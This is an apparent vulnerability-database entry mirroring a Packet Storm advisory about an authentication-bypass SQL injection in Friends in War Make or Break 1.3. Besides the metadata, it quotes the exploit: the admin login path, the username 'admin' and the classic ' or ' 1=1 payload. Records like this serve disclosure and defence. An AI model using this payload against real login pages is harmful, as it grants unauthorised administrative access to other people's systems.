Details of VAR-E-201211-0529

ID

VAR-E-201211-0529

TITLE

Friends In War Make Or Break 1.3 SQL Injection

Trust: 0.5

sources: PACKETSTORM: 118149

DESCRIPTION

Friends in War Make or Break version 1.3 suffers from a remote SQL injection vulnerability.

Trust: 0.5

sources: PACKETSTORM: 118149

AFFECTED PRODUCTS

vendor:

friends

model:

in war make or break

scope:

version:

1.3

Trust: 0.5

sources: PACKETSTORM: 118149

EXPLOIT

# Exploit Title: friendsinwar Make or break V1.3 SQL Injection (authbypass) Vulnerability
# Date: 13.10.201
# Exploit Author: d3b4g
# Vendor Homepage: http://www.friendsinwar.com
# Software Link: http://www.friendsinwar.com/script_demo/make_or_break/admin/login.php
# Tested on: Windows 7
# Blog: d3b4g.me

----------------------------------------------------------------------------------
() SQL Injection :

http://localhost/script_demo/make_or_break/admin/login.php

+ Use following information to bypass login.

User:admin

' or ' 1=1

-end-

Trust: 0.5

sources: PACKETSTORM: 118149

EXPLOIT HASH

LOCAL

SOURCE

md5:	a4b6d8bd5ac518b68ec0a0dfa027631c
sha-1:	75bbbb1686ce5b7a6fc3f629ed120b06f007dcc9
sha-256:	81ad86c40bc7d1ac6b2dfe9298413b363facb2e3856fb74dd248ce7d89c741ce

md5:	a4b6d8bd5ac518b68ec0a0dfa027631c

Trust: 0.5

sources: PACKETSTORM: 118149

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 118149

TYPE

sql injection

Trust: 0.5

sources: PACKETSTORM: 118149

CREDITS

d3b4g

Trust: 0.5

sources: PACKETSTORM: 118149

EXTERNAL IDS

db:

PACKETSTORM

id:

118149

Trust: 0.5

sources: PACKETSTORM: 118149

SOURCES

db:

PACKETSTORM

id:

118149

LAST UPDATE DATE

2022-07-27T09:30:16.982000+00:00

SOURCES RELEASE DATE

db:

PACKETSTORM

id:

118149

date:

2012-11-16T07:19:39

tag:	exploit	Trust: 0.5
tag:	remote	Trust: 0.5
tag:	sql injection	Trust: 0.5

ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT HASH

LOCAL

SOURCE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

SOURCES

LAST UPDATE DATE

SOURCES RELEASE DATE